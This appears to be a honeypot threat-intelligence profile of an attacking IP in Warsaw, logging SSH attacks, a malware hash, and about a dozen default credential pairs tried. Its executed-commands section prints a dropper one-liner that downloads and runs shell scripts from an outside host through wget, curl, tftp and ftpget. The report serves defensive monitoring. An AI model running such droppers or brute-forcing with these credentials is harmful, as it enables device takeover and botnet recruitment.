โš TROYANOSYVIRUS
Active Threat โ€ข LOW

151.115.80.140

First Detection2/9/2026
Last Activity2/9/2026
ISPScaleway S.a.s.
๐ŸŽฏ
68
Total Attacks
๐Ÿ”Œ
1
Ports
๐Ÿ“ก
1
Attack Types
๐Ÿฆ 
1
Malware

Geolocation

Country
๐Ÿ‡ต๐Ÿ‡ฑ Poland
City
Warsaw
ASN
AS12876
ISP
Scaleway S.a.s.

Attack Types

cowrie

Attacked Ports

22

Associated Malware

c6c5b918005b5fa8515f...โ†’

Attempted Credentials

๐Ÿ”admin/admin
2x
๐Ÿ”guest/guest
1x
๐Ÿ”root/oelinux123
1x
๐Ÿ”root/1
1x
๐Ÿ”root/1234
1x
๐Ÿ”root/root
1x
๐Ÿ”root/123456
1x
๐Ÿ”root/ute123
1x
๐Ÿ”dev/dev
1x
๐Ÿ”user/user
1x
๐Ÿ”ubnt/ubnt
1x
๐Ÿ”ubuntu/ubuntu
1x

Executed Commands

$uname -a ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://87.121.84.11/cnd.sh 2>/dev/null; curl -sO http://87.121.84.11/cnd.sh 2>/dev/null; chmod 777 cnd.sh 2>/dev/null; sh cnd.sh 2>/dev/null; tftp 87.121.84.11 -c get cnd1.sh 2>/dev/null; chmod 777 cnd1.sh 2>/dev/null; sh cnd1.sh 2>/dev/null; tftp -r cnd2.sh -g 87.121.84.11 2>/dev/null; chmod 777 cnd2.sh 2>/dev/null; sh cnd2.sh 2>/dev/null; ftpget -v -u anonymous -p anonymous -P 21 87.121.84.11 cnd3.sh cnd3.sh 2>/dev/null; sh2x

Risk Assessment

35
/100
LowMediumHighCritical